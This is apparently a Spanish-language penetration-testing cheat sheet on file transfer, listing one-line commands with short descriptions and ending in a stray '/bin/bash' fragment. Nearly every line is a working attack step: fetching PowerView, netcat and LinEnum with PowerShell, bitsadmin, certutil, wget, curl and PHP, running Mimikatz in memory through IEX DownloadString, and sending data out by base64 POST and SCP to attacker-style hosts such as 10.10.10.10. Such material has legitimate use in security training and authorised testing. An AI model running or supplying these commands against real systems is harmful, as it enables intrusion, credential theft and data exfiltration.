Transporte de ficheros
Invoke-WebRequest https://10.10.10.10/PowerView.ps1 -OutFile PowerView.ps1 | Descargar un archivo con PowerShell
IEX (New-Object Net.WebClient).DownloadString('https://10.0.0.10/Invoke-Mimikatz.ps1') | Ejecutar un archivo en memoria usando PowerShell
Invoke-WebRequest -Uri http://10.10.10.10:443 -Method POST -Body $b64 | Subir un archivo con PowerShell
bitsadmin /transfer n http://10.10.10.10/nc.exe C:\Temp\nc.exe | Descargar un archivo usando Bitsadmin
certutil.exe -verifyctl -split -f http://10.10.10.10/nc.exe | Descargar un archivo usando Certutil
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh | Descargar un archivo usando Wget
curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | Descargar un archivo usando cURL
php -r '$file = file_get_contents("https://lab154.net/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);' | Descargar un archivo usando PHP
scp C:\Temp\bloodhound.zip user@10.10.10.150:/tmp/bloodhound.zip | Subir un archivo usando SCP
scp user@target:/tmp/mimikatz.exe C:\Temp\mimikatz.exe | Descargar un archivo usando SCP
Invoke-WebRequest http://nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "nc.exe" | Invoke-WebRequest usando un agente de usuario de Chrome
_ /bin/bash/